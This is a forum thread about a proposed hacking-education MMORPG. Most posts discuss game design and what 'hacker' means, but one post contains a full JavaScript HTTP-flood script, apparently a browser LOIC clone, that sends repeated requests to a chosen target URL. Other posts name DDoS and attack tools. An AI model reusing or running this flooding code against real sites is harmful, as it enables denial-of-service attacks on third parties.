Jump to content

Recommended Posts

Posted

So, the idea comes down to developing an MMORPG that educates people about how hacking really works. It isn't like a regular MMORPG, but it copy's elements in some ways. In this case, the way this "game" works is the world you are navigating in, the webpages, is only explored through by finding bugs within the webpages to get to the next webpage. This could mean breaking into a password-protected admin page or finding ways to exploit the system to get passwords that allow you to access other parts of the website.

 

The more websites you are able to access, the more "points" you get for doing so. There would also be a ranking system based on how long it takes you to enter an area of "solve a puzzle."

 

So, what do you people think of the idea?

Posted

Sounds quite fun, possibly, but two points here - 1) such a game can be thought as promoting illegal activity and 2) using bugs and errors to access restricted/protected content is not the original meaning of hacking.

Posted (edited)

Sounds quite fun, possibly, but two points here - 1) such a game can be thought as promoting illegal activity and 2) using bugs and errors to access restricted/protected content is not the original meaning of hacking.

1) So does the GTA series, yet it still is a popular series. However, this game is not supposed to promote illegal activity. It educates people about how it is done and the battle between those who fight for a secure Internet access and those who are the black hats.

2) "People committed to circumvention of computer security. This primarily concerns unauthorized remote computer break-ins via communication networks such as the Internet (Black hats), but also includes those who debug or fix security problems (White hats), and the morally ambiguous Grey hats. See Hacker (computer security)."

 

This game's intention implements this ideal as a game mechanic.

Edited by Unity+
Posted

1) So does the GTA series, yet it still is a popular series. However, this game is not supposed to promote illegal activity. It educates people about how it is done and the battle between those who fight for a secure Internet access and those who are the black hats.

2) "People committed to circumvention of computer security. This primarily concerns unauthorized remote computer break-ins via communication networks such as the Internet (Black hats), but also includes those who debug or fix security problems (White hats), and the morally ambiguous Grey hats. See Hacker (computer security)."

 

This game's intention implements this ideal as a game mechanic.

 

 

BTW, how is the MMO element going to be implemented in the game? What is going to be the interaction between players?

Posted

 

 

BTW, how is the MMO element going to be implemented in the game? What is going to be the interaction between players?

Well, the mechanic of breaking into pseudo-websites(which will consist of a community of people) and having people control these websites when they take control of it through the ways I have mentioned will be the MMO aspect. It will pretty much a Command and Conquer type deal.

Posted

Who is the target audience?

 

Apparently there exists a genre called "hacking simulation". https://en.wikipedia.org/wiki/Street_Hacker Perhaps it could be made multiplayer if contained within a secure virtual machine. But why not just download Kali Linux (for free) and do home penetration testing with a spare laptop?

 

Educating them is probably a good idea. I speculate that victims are generally unsuspecting and underprepared... Everybody thinks they've "secured" their wifi, but it's only a speed bump to a determined attacker.

Posted

The game might be fun, but if it were at all realistic, it would probably have limited appeal. However, if you're learning game design or software engineering generally, it might be a fun side project regardless of its ultimate success. I would have said something similar about Minecraft before its release, though, so eh. :P You never know what will catch on.

 

As for the term "hacker," pavel was referring to the original meaning detailed here. Of course, particularly clever methods found for breaking security might justifiably be called hacks, but nowadays any 15-year-old who can work out how to install LOIC might be called a "hacker" by the media (including tech-oriented media) as well as by computing enthusiasts in general. I think that particular battle has been lost, anyway, so it's a minor point.

Posted

I've seen sites made for hacking in an educational context. A game expanding upon this premise could be interesting. Finding the right balance between boredom and maintaining interest would likely be the biggest challenge.

 

I've seen the dumber down game versions, but they always walk you through what you need to do. No need for coding knowledge, no waiting for the inevitable bugged update, trying unexpected inputs, eyeballing the code hunting for assumptions or perusing user comments for evidence of bugs/glitches.

 

Should note there are automated programs to find exploits, out there as well.

Posted

The term "hacker" is returning to its original meaning as of recent. Hackathons are becoming more popular in the public eye, especially with millennials like me and others who hadn't been earlier interested in the culture, and so the connotation is leaning towards "cyber-circumventer of problems, practitioner of programming". You see more people describing themselves as hackers with reference to that than you do otherwise; now it's "software engineer, hacker", "information security expert, hacker".

 

In any case, the game may not be intended to give a rigorous education on computer security, but rather to give an idea of the technical goings-ons behind "hacking" in a gammified context. Previous attempts are either entirely too stoic and technical for the general gamer population, or otherwise excessively inaccurate (a trade-off for ease of experience).

 

 

The game might be fun, but if it were at all realistic, it would probably have limited appeal. However, if you're learning game design or software engineering generally, it might be a fun side project regardless of its ultimate success. I would have said something similar about Minecraft before its release, though, so eh. :P You never know what will catch on.

 

As for the term "hacker," pavel was referring to the original meaning detailed here. Of course, particularly clever methods found for breaking security might justifiably be called hacks, but nowadays any 15-year-old who can work out how to install LOIC might be called a "hacker" by the media (including tech-oriented media) as well as by computing enthusiasts in general. I think that particular battle has been lost, anyway, so it's a minor point.

 

In infosec hacker lingo that's called a "skiddie" or script kiddie. Don't forget Havij and Cain And Able!

Posted
any 15-year-old who can work out how to install LOIC might be called a "hacker" by the media (including tech-oriented media) as well as by computing enthusiasts in general. I think that particular battle has been lost, anyway, so it's a minor point.

 

 

LOIC isn't hacking it is just a java-script counter it doesn't actually do anything it is just a piece of art

Posted (edited)

 

LOIC isn't hacking it is just a java-script counter it doesn't actually do anything it is just a piece of art

 

How so? LOIC and HOIC have been used quite successfully in massive co-ordinated DDOS attacks. But obviously, just as John pointed, it's not really hacking as it requires literally no knowledge of computer architecture, networking or programming. Yet media, even reliable and respected news companies are happy to release yet another headline like "Hackers from Anonymous group attack *\ insert website name *\", which could be because an alternative headline "A bunch of school kids take down a major government website" is a bit too scary.

Edited by pavelcherepan
Posted (edited)
<script>
        (function () {
            var fireInterval;
            var isFiring = false;
            var requestedCtrNode = document.getElementById("requestedCtr"),
                succeededCtrNode = document.getElementById("succeededCtr"),
                failedCtrNode = document.getElementById("failedCtr"),
                targetURLNode = document.getElementById("targetURL"),
                fireButton = document.getElementById("fireButton"),
                messageNode = document.getElementById("message"),
                rpsNode = document.getElementById("rps"),
                timeoutNode = document.getElementById("timeout");
            var targetURL = targetURLNode.value;
            targetURLNode.onchange = function () {
                targetURL = this.value;
            };
            var requestsHT = {}; // requests hash table, may come in handy later
            var requestedCtr = 0,
                succeededCtr = 0,
                failedCtr = 0;
            var makeHttpRequest = function () {              
                    if (requestedCtr > failedCtr + succeededCtr + 1000) { //Allow no more than 1000 hung requests
                        return;
                    };
                               var rID =Number(new Date());
                    var img = new Image();
                    img.onerror = function () { onFail(rID); };
                    img.onabort = function () { onFail(rID); };
                    img.onload = function () { onSuccess(rID); }; // TODO: it may never happen if target URL is not an image... // but probably can be fixed with different                               
                    img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
                   requestsHT[rID] = img;
                    onRequest(rID);
                };
            var onRequest = function (rID) {
                    requestedCtr++;
                    requestedCtrNode.innerHTML = requestedCtr;
                };

            var onComplete = function (rID) {
                    delete requestsHT[rID];
                };
           var onFail = function (rID) {
                   // failedCtr++;
                    //failedCtrNode.innerHTML = failedCtr;               
                    succeededCtr++; //Seems like the url will always fail it it isn't an image
                    succeededCtrNode.innerHTML = succeededCtr;
                   delete requestsHT[rID]; // we can't keep it forever or it would blow up the browser
                };

           var onSuccess = function (rID) {
                    succeededCtr++;
                    succeededCtrNode.innerHTML = succeededCtr;
                    delete requestsHT[rID];

                };

            fireButton.onclick = function () {

                if (isFiring) {

                    clearInterval(fireInterval);
                    isFiring = false;
                    this.innerHTML = "IMMA CHARGING MAH LAZER";

                } else {

                    isFiring = true;
                    this.innerHTML = "Stop flooding";
                    fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(rpsNode.value) | 0));

                }

            };
        })();
How so? LOIC and HOIC have been used quite successfully in massive co-ordinated DDOS attacks.

 

No you can see very clearly that they are just counting up. Most hacking actually comes from the incorrect use of forms by bad programmers on websites. For example if somebody could post on this forum with a link like http://www.scienceforums.net/topic/88578-mmorpg-about-educating-people-on-how-hacking-works/#entry864534?post="haha I hacked you". Then they could spam posts practically non stop.

Edited by fiveworlds
Posted (edited)

I'm not sure what you're getting at. LOIC has certainly been used in several high-profile DDoS attacks in recent years (for example, some discussion and links to related news stories can be found here: https://www.us-cert.gov/ncas/alerts/TA12-024A).The JavaScript implementation is interesting, but it doesn't support the entire feature set of LOIC itself (which is a Windows desktop application written in C#).

 

In any case, that's a tangent of a tangent.

 

Regarding the actual thread topic, as others have mentioned or alluded to, striking the proper balance between authenticity and entertainment is tricky. The subject in general is probably also a bit esoteric if you're looking for something with mainstream appeal. Then again, 0x10c faced similar issues, and there was some excitement building around it, though it did have the benefit of Markus Persson's name being attached to it. Of course, 0x10c has been put on indefinite hold, but apparently that's due to notch being unsure of where to go with it.

Edited by John
Posted (edited)

As far as I am aware the C# version of Loic is hosted on git hub https://github.com/NewEraCracker/LOICand no I haven't looked to see if every version of loic does nothing because I know how to write a DDos program anyway. Besides the clue is in the name D Dos. Dos is on every windows computer at the moment http://en.wikipedia.org/wiki/MS-DOS#End_of_MS-DOSas command.com. It will launch as Microsoft ® Windows Dos © Microsoft Corp 1990-2001

These people claim to have an affiliation to the original dos http://www.digitalresearch.biz/CPM.HTM

and you can actually download a zip file off them with command.com in it.

Edited by fiveworlds
Posted (edited)

Er, DDoS stands for "Distributed Denial of Service." It has nothing to do with DOS the (family of) "Disk Operating System(s)."

 

In any case, yes, it's very easy to launch a DoS attack, and even to write a special program for it. That was my entire point, that being able to DDoS a server requires very little technical know-how, yet attacks on that level are still often referred to as "hacking" by the media.

 

Anyway, as mentioned, it's a bit off-topic, so I won't be saying more about it in this thread. I was simply elaborating on pavel's point in his first post.

Edited by John
  • 2 months later...
Posted (edited)

https://hackeracademy.com and http://hackingdojo.com/ came up in internet search. I was trying to find one a saw awhile back, where it was like a game and they had like a shooting range with websites and stuff they setup that you could practice on. They would restore everything from backups like every 24 hours.

 

You should check out the competition.

Edited by 3blake7
  • 2 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.